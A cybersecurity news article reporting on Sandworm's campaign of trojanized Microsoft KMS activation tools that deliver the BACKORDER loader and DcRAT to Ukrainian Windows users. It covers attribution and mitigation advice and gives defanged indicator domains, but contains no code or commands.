Friday, May 9, 2025
Homecyber securitySandworm APT Hackers Weaponize Microsoft KMS Activation Tools To Compromise Windows

Sandworm APT Hackers Weaponize Microsoft KMS Activation Tools To Compromise Windows

Published on

SIEM as a Service

Follow Us on Google News

In a sophisticated cyber-espionage operation, the Russian state-sponsored hacking group Sandworm (APT44), linked to the GRU (Russia’s Main Intelligence Directorate), has been exploiting pirated Microsoft Key Management Service (KMS) activation tools to target Ukrainian Windows users.

The campaign, which began in late 2023, leverages trojanized KMS activators and fake Windows updates to deploy malware, including the BACKORDER loader and Dark Crystal Remote Access Trojan (DcRAT).

Sandworm APT Hackers
Torrent info of the malicious KMS Auto Tool.

These tools enable large-scale data theft and espionage, posing significant risks to Ukraine’s critical infrastructure and national security.

- Advertisement - Google News

Exploiting Pirated Software as an Attack Vector

Ukraine’s high reliance on unlicensed software estimated at 70% in the public sector has created a fertile ground for such attacks.

Many users, including government institutions and businesses, turn to pirated software due to economic constraints.

Sandworm capitalizes on this vulnerability by embedding malware within widely used tools like KMS activators.

Researchers from EclecticIQ identified multiple campaigns distributing a trojanized file named “KMSAuto++x64_v1.8.4.zip” via torrent platforms, disguised as a legitimate Windows activation utility.

Sandworm APT Hackers
Downloading TOR browser from remote host inside the ZIP folder.

Upon execution, the malicious tool displays a fake Windows activation interface while secretly deploying the BACKORDER loader.

This loader disables Windows Defender by adding exclusion rules through PowerShell commands and then downloads DcRAT from attacker-controlled domains such as “kmsupdate2023[.]com.”

Once installed, DcRAT exfiltrates sensitive data, including screenshots, keystrokes, browser credentials, system information, and even saved credit card details.

The malware also establishes persistence by creating scheduled tasks that ensure its continued operation across system reboots.

Linking Sandworm to the Campaign

Multiple indicators strongly attribute this campaign to Sandworm.

These include overlapping infrastructure, shared tactics and techniques (TTPs), and the reuse of malware like BACKORDER and DcRAT.

Debug symbols in the malware samples reference Russian-language build environments, further confirming its origin.

Additionally, WHOIS records tied to ProtonMail accounts and typosquatted domains like “kms-win11-update[.]net” reinforce the connection.

This campaign underscores the strategic use of cyber operations in geopolitical conflicts.

By targeting Ukraine’s reliance on pirated software, Sandworm not only compromises individual users but also threatens government networks and critical infrastructure.

Such attacks align with Russia’s broader hybrid warfare strategy, where cyber operations complement physical and economic pressures.

Organizations are advised to avoid pirated software and implement robust cybersecurity measures such as endpoint detection tools and network monitoring systems.

Enhanced awareness of phishing tactics and regular software updates can also mitigate risks from similar campaigns.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Researchers Uncover Remote Code Execution Flaw in macOS – CVE-2024-44236

Security researchers Nikolai Skliarenko and Yazhi Wang of Trend Micro’s Research Team have disclosed...

Apache ActiveMQ Vulnerability Allows Attackers to Induce DoS Condition

Critical vulnerability in Apache ActiveMQ (CVE-2024-XXXX) exposes brokers to denial-of-service (DoS) attacks by allowing...

Kaspersky Alerts on AI-Driven Slopsquatting as Emerging Supply Chain Threat

Cybersecurity researchers at Kaspersky have identified a new supply chain vulnerability emerging from the...

UK Government to Shift Away from Passwords in New Security Move

UK government has unveiled plans to implement passkey technology across its digital services later...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Researchers Uncover Remote Code Execution Flaw in macOS – CVE-2024-44236

Security researchers Nikolai Skliarenko and Yazhi Wang of Trend Micro’s Research Team have disclosed...

Apache ActiveMQ Vulnerability Allows Attackers to Induce DoS Condition

Critical vulnerability in Apache ActiveMQ (CVE-2024-XXXX) exposes brokers to denial-of-service (DoS) attacks by allowing...

Kaspersky Alerts on AI-Driven Slopsquatting as Emerging Supply Chain Threat

Cybersecurity researchers at Kaspersky have identified a new supply chain vulnerability emerging from the...